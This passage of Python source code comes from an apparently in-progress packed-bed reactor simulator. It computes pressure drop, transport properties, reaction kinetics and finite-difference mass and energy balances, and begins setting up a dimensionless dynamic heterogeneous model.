# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# dimensionless analysis
SuGaVe_ReVa = rmtUtil.calRealDiLessValue(SuGaVe, SuGaVe0)
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = calMolarFlowRate(CoSp_ReVa, SuGaVe_ReVa, CrSeAr)
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp_ReVa*1000)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# dimensionless value
GaDe_DiLeVa = rmtUtil.calDiLessValue(GaDe, GaDe0)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe_ReVa/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe_ReVa**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVii = GaVii0 if MODEL_SETTING['GaVii'] == "FIX" else calTest()
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
# FIXME
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# solid gas thermal conductivity
SoThCoMix0 = GaThCoMix0
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = GaThCoi0 if MODEL_SETTING['GaThCoi'] == "FIX" else calTest(
)
# dimensionless
GaThCoi_DiLe = GaThCoi/GaThCoi0
# FIXME
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix = GaThCoMix0
# dimensionless analysis
GaThCoMix_DiLeVa = GaThCoMix/GaThCoMix0
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = GaThCoMix0
# dimensionless analysis
SoThCoMix_DiLeVa = SoThCoMix/SoThCoMix0
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# dimensionless analysis
GaThCoEff_DiLeVa = BeVoFr*GaThCoMix_DiLeVa
# FIXME
# effective thermal conductivity - solid phase [J/s.m.K]
# assume identical to gas phase
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
# SoThCoEff = CaThCo*((1 - CaPo)/CaTo)
SoThCoEff = CaPo*SoThCoMix
# dimensionless analysis
# SoThCoEff_DiLeVa = GaThCoMix_DiLeVa*((1 - CaPo)/CaTo)
SoThCoEff_DiLeVa = CaPo*SoThCoMix_DiLeVa
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
GaDii = GaDii0 if MODEL_SETTING['GaDii'] == "FIX" else calTest()
# dimensionless analysis
GaDii_DiLeVa = GaDii/GaDii0
# effective diffusivity coefficient - gas phase
GaDiiEff = GaDii*BeVoFr
# dimensionless analysis
GaDiiEff_DiLeVa = GaDiiEff/GaDii0
# effective diffusivity - solid phase [m^2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# dimensionless analysis
SoDiiEff_DiLe = (CaPo/CaTo)*GaDii_DiLeVa
# REVIEW
if MODEL_SETTING['MaTrCo'] != "FIX":
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
# loop
loopVars0 = (Ts_r_ReVa[r], P_z[z],
MoFrsi_r[r], CosSpi_r_ReVa[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = r0
# component formation rate [kmol/m^3.s]
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, T_ReVa)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# dimensionless analysis
GaCpMeanMix_DiLeVa = rmtUtil.calDiLessValue(
GaCpMeanMix, GaCpMeanMix0)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# dimensionless analysis
GaCpMeanMixEff_DiLeVa = GaCpMeanMix_DiLeVa*BeVoFr
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r_ReVa[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff_ReVa[r] = CosSp_r_ReVa[r] * \
SoCpMeanMix[r]*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r_ReVa[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
if MODEL_SETTING['HeTrCo'] != "FIX":
### dimensionless numbers ###
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
# Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T_ReVa, U, a, 'kJ/m^3.s')
# NOTE
# mass transfer between
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# dimensionless analysis: real value
Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_DiLeVa[i])
# total mass transfer between gas and solid phases [kmol/m^3]
ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# # next node
# T_f = T_z[z+1]
# # previous node
# T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
# elif z == zNo - 1:
# # BC2
# # previous node
# T_b = T_z[z - 1]
# # next node
# T_f = 0
# else:
# # interior nodes
# T_b = T_z[z-1]
# # next node
# T_f = T_z[z+1]
# dxdt_v_T = (T_z[z] - T_b)/dz
# # CoSp x 1000
# # OvR x 1000
# dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
# ((1/T_z[z])*dxdt_P - (P_z[z]/T_z[z]**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
# FIXME
# v_z[z+1] = dxdt_v*dz + v_z[z]
# v_z[z+1] = v
# FIXME
v_z[z+1] = v_z[z]
# dimensionless analysis
v_z_DiLeVa = rmtUtil.calDiLessValue(v_z[z+1], vf)
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# bulk temperature [K]
T_c = T_z[z]
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0 and solverMeshSet is True:
# NOTE
# BC1 (normal)
BC1_C_1 = PeNuMa0[i]*dz
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC1)
elif z == 0 and solverMeshSet is False:
# NOTE
# BC1 (dense)
# i=0 is discretized based on inlet
# i=1
BC1_C_1 = PeNuMa0[i]*dzs[z]
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dzs[z], DIFF1_C_SET)
# d2Fdz2
# d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1)
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# dCdz = FiDiNonUniformDerivative1(
# dFdz_C, dzs[z], DIFF1_C_SET, zR[z])
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1, _zR_c)
# FIXME
checkME = 0
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dCdz = FiDiNonUniformDerivative1(
dFdz_C, dzs[z], DIFF1_C_SET, _zR_b)
# d2Fdz2
d2Cdz2 = FiDiNonUniformDerivative2(
d2Fdz2_C, dzs[z], DIFF2_C_SET_G, _zR_c)
# FIXME
checkME = 0
elif z == zNo - 1:
# NOTE
# BC2
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# forward difference
Ci_f = Ci_b
Ci_ff = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC2)
else:
# NOTE
# normal sections
# interior nodes
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2] if z < zNo-2 else 0
# backward
Ci_b = SpCoi_z[i][z-1]
Ci_bb = SpCoi_z[i][z-2]
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dCdz = (Ci_c - Ci_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*dCdz
# central difference for dispersion
# d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = (BeVoFr*GaDii_DiLeVa[i]/PeNuMa0[i])*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
_inwardFlux = (1/GaMaCoTe0[i])*MoFli_z[i]*SpSuAr
# mass balance
# convective, dispersion, inward flux
# const
_const1 = BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_F = _const2*(_convectiveTerm +
_dispersionFluxC - _inwardFlux)
dxdtMat[i][0][z] = dxdt_F
### solid phase ###
# bulk concentration [kmol/m^3]
# Ci_c
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# Cs[0], Cs[1], ...
_Cs_r_Flip = np.flip(_Cs_r)
# reaction term
_ri_r = ri_r[:, i]
# flip
_ri_r_Flip = np.flip(_ri_r)
# dimensionless analysis
# loop
_dCsdtiVarLoop = (
GaDii_DiLeVa[i], MaTrCo[i], _ri_r_Flip, Ci_c, CaPo, SoMaDiTe0[i], GaDii0[i], rf)
# dC/dt list
dCsdti = FiDiBuildCMatrix_DiLe(
compNo, PaRa, rNo, _Cs_r_Flip, _dCsdtiVarLoop, mode="default", fluxDir="rl")
# const
_const1 = CaPo*(rf**2/GaDii0[i])
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[i][r+1][z] = _const2*dCsdti[r]
# NOTE
# energy balance
# bulk temperature [K]
# T_c
# T_c = T_z[z]
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# check BC
if z == 0 and solverMeshSet is True:
# BC1
BC1_T_1 = PeNuHe0*dz
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC1)
elif z == 0 and solverMeshSet is False:
# BC1
BC1_T_1 = PeNuHe0*dzs[z]
BC1_T_2 = 1/BC1_T_1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
# GaDe_DiLeVa, GaCpMeanMix_DiLeVa, v_z_DiLeVa = 1
# T*[0] = (T0 - Tf)/Tf
T_0 = 0
T_b = (T_0 + BC1_T_2*T_f)/(BC1_T_2 + 1)
T_bb = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dzs[z], DIFF1_T_SET)
# d2Fdz2
# d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF_T_SET_BC1)
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
# FIXME
checkME = 0
elif (z > 0 and z < zNoNoDense) and solverMeshSet is False:
# NOTE
# dense section
# i=2,...,zNoNoDense-1
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2]
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_bb, T_b, T_c, T_f, T_ff]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### non-uniform nodes ###
# R value
_zR_b = dzs[z-2]/dzs[z-1]
_zR_c = dzs[z]/dzs[z-1]
#
dTdz = FiDiNonUniformDerivative1(
dFdz_T, dzs[z], DIFF1_T_SET, _zR_b)
# d2Fdz2
d2Tdz2 = FiDiNonUniformDerivative2(
d2Fdz2_T, dzs[z], DIFF2_T_SET_G, _zR_c)
# FIXME
checkME = 0
elif z == zNo - 1:
# BC2
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# forward
T_f = T_b
T_ff = 0
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_BC2)
else:
# interior nodes
# forward
T_f = T_z[z+1]
T_ff = T_z[z+2] if z < zNo-2 else 0
# backward
T_b = T_z[z-1]
T_bb = T_z[z-2]
# function value
dFdz_T = [T_b, T_c, T_f]
d2Fdz2_T = [T_bb, T_b, T_c, T_f, T_ff]
# REVIEW
### uniform nodes ###
# dFdz
dTdz = FiDiDerivative1(dFdz_T, dz, DIFF1_T_SET)
# d2Fdz2
d2Tdz2 = FiDiDerivative2(d2Fdz2_T, dz, DIFF2_T_SET_G)
# REVIEW
# cal differentiate
# backward difference
# dTdz = (T_c - T_b)/(1*dz)
# convective term
_convectiveTerm = -1*v_z_DiLeVa*GaDe_DiLeVa*GaCpMeanMix_DiLeVa*dTdz
# central difference
# d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# dispersion flux [kJ/m^3.s]
# _dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3
_dispersionFluxT = ((1/PeNuHe0)*GaThCoEff_DiLeVa*d2Tdz2)*1
# temperature in the catalyst surface [K]
# Ts_cat
# outward flux [kJ/m^2.s]
_inwardFluxT = HeTrCo*SpSuAr*Tf*(_Ts_r[0] - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
_heTrBeGaSoTerm = (1/GaHeCoTe0)*_inwardFluxT
# heat exchange term [kJ/m^3.s] -> [no unit]
_heatExchangeTerm = (1/GaHeCoTe0)*Qm
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
# const
_const1 = GaDe_DiLeVa*GaCpMeanMix_DiLeVa*BeVoFr*(zf/vf)
_const2 = 1/_const1
#
dxdt_T = _const2*(_convectiveTerm + _dispersionFluxT +
_heTrBeGaSoTerm + _heatExchangeTerm)
dxdtMat[indexT][0][z] = dxdt_T
### solid phase ###
# _Ts_r
# T[n], T[n-1], ..., T[0] => T[0],T[1], ...
_Ts_r_Flip = np.flip(_Ts_r)
# dC/dt list
# convert
# [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = CaPo*SoThCoMix0/1000
# OvHeReT [kJ/m^3.s]
OvHeReT_Conv = np.flip(-1*OvHeReT)
# HeTrCo [J/m^2.s.K] => [kJ/m^2.s.K]
HeTrCo_Conv = HeTrCo/1000
# var loop
_dTsdtiVarLoop = (SoThCoEff_DiLeVa, HeTrCo_Conv,
OvHeReT_Conv, T_c, CaPo, SoHeDiTe0, SoThCoEff_Conv, rf)
# dTs/dt list
dTsdti = FiDiBuildTMatrix_DiLe(
compNo, PaRa, rNo, _Ts_r_Flip, _dTsdtiVarLoop)
# const
_const1 = SoCpMeanMixEff_ReVa*Tf/SoHeDiTe0
_const2 = 1/_const1
#
for r in range(rNo):
# update
dxdtMat[indexT][r+1][z] = _const2[r]*dTsdti[r]
# NOTE
# flat
dxdt = dxdtMat.flatten().tolist()
# print
strTime = "time: {:.5f} seconds".format(t)
# print(strTime)
print(f"time: {t} seconds")
return dxdt
# NOTE
# dynamic heterogenous modeling
def runM8(self):
"""
modeling case (dimensionless)
dynamic model
unknowns: Ci, T (dynamic), P, v (static), Cci, Tc (static, for catalyst)
CT, GaDe = f(P, T, n)
numerical method: finite difference
"""
# NOTE
# start computation
start = timer()
# solver setting
solverConfig = self.modelInput['solver-config']
solverIVPSet = solverConfig['ivp']
solverMesh = solverConfig['mesh']
solverMeshSet = True if solverMesh == "normal" else False
# operating conditions
P = self.modelInput['operating-conditions']['pressure']
T = self.modelInput['operating-conditions']['temperature']
# operation time [s]
opT = self.modelInput['operating-conditions']['period']
# reaction list
reactionDict = self.modelInput['reactions']
reactionList = rmtUtil.buildReactionList(reactionDict)
# number of reactions
reactionListNo = len(reactionList)
# component list
compList = self.modelInput['feed']['components']['shell']
# graph label setting
labelList = compList.copy()
labelList.append("Temperature")
# labelList.append("Pressure")
# component no
compNo = len(compList)
indexTemp = compNo
indexPressure = indexTemp + 1
indexVelocity = indexPressure + 1
# reactor spec
ReSpec = self.modelInput['reactor']
# reactor inner diameter [m]
ReInDi = ReSpec['ReInDi']
# reactor length [m]
ReLe = ReSpec['ReLe']
# cross-sectional area [m^2]
CrSeAr = CONST.PI_CONST*(ReInDi ** 2)/4
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = self.modelInput['feed']['volumetric-flowrate']
# inlet species concentration [kmol/m^3]
SpCoi0 = np.array(self.modelInput['feed']['concentration'])
# inlet total concentration [kmol/m^3]
SpCo0 = np.sum(SpCoi0)
# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# diffusivity coefficient - gas phase [m^2/s]
GaDii0 = self.modelInput['feed']['diffusivity']
# gas viscosity [Pa.s]
GaVii0 = self.modelInput['feed']['viscosity']
# gas mixture viscosity [Pa.s]
GaViMix0 = self.modelInput['feed']['mixture-viscosity']
# thermal conductivity - gas phase [J/s.m.K]
GaThCoi0 = self.modelInput['feed']['thermal-conductivity']
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix0 = self.modelInput['feed']['mixture-thermal-conductivity']
# REVIEW
# domain length
DoLe = 1
# orthogonal collocation points in the r direction
rNo = solverSetting['S2']['rNo']
# mesh setting
zMesh = solverSetting['T1']['zMesh']
# number of nodes
zNoNo = zMesh['zNoNo']
# domain length section
DoLeSe = zMesh['DoLeSe']
# mesh refinement degree
MeReDe = zMesh['MeReDe']
# mesh installment
if solverMeshSet is False:
zMeshRes = FiDiMeshGenerator(zNoNo, DoLe, DoLeSe, MeReDe)
# finite difference points
dataXs = zMeshRes['data1']
# dz lengths
dzs = zMeshRes['data2']
# finite difference point number
zNo = zMeshRes['data3']
# R ratio
zR = zMeshRes['data4']
# dz
dz = zMeshRes['data5']
else:
# finite difference points in the z direction
zNo = solverSetting['T1']['zNo']
# length list [reactor length]
dataXs = np.linspace(0, DoLe, zNo)
# element size - dz [m]
dz = DoLe/(zNo-1)
# reset
dzs = []
zR = []
### calculation ###
# mole fraction in the gas phase
MoFri0 = np.array(rmtUtil.moleFractionFromConcentrationSpecies(SpCoi0))
# mixture molecular weight [kg/mol]
MiMoWe0 = rmtUtil.mixtureMolecularWeight(MoFri0, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe0 = calDensityIG(MiMoWe0, SpCo0*1000)
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList0 = calMeanHeatCapacityAtConstantPressure(compList, T)
# Cp mixture
GaCpMeanMix0 = calMixtureHeatCapacityAtConstantPressure(
MoFri0, GaCpMeanList0)
# thermal diffusivity in the gas phase [m^2/s]
GaThDi = calThermalDiffusivity(
GaThCoMix0, GaDe0, GaCpMeanMix0, MiMoWe0)
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo + 1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo + 1
# number of var columns [i]
varNoColumns = zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
IV2D[m][j][i] = SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
else:
# solid phase
# SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
# SpCoi0[m]/np.max(SpCoi0) # SpCoi0[m]
IV2D[m][j][i] = 1e-6
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
IV2D[noLayer - 1][j][i] = 0 # T
else:
# solid phase
IV2D[noLayer - 1][j][i] = 0 # T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# REVIEW
# solver setting
# orthogonal collocation method
OrCoClassSet = OrCoClass()
OrCoClassSetRes = OrCoClassSet.buildMatrix()
# NOTE
### dimensionless analysis ###
# concentration [kmol/m^3]
Cif = np.copy(SpCoi0)
# total concentration
Cf = SpCo0
# temperature [K]
Tf = T
# superficial velocity [m/s]
vf = SuGaVe0
# length [m]
zf = ReLe
# diffusivity [m^2/s]
Dif = np.copy(GaDii0)
# heat capacity at constant pressure [J/mol.K] | [kJ/kmol.K]
Cpif = np.copy(GaCpMeanList0)
# mixture heat capacity [J/mol.K] | [kJ/kmol.K]
Cpf = GaCpMeanMix0
# radius
rf = PaDi/2
# gas phase
# mass convective term - (list) [kmol/m^3.s]
_Cif = Cif if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.repeat(
np.max(Cif), compNo)
GaMaCoTe0 = (vf/zf)*_Cif
# mass diffusive term - (list) [kmol/m^3.s]
GaMaDiTe0 = (1/zf**2)*(_Cif*Dif)
# heat convective term [kJ/m^3.s]
GaHeCoTe0 = (GaDe0*vf*Tf*(Cpf/MiMoWe0)/zf)*1e-3
# heat diffusive term [kJ/m^3.s]
GaHeDiTe0 = (Tf*GaThCoMix0/zf**2)*1e-3
# solid phase
# mass diffusive term - (list) [kmol/m^3.s]
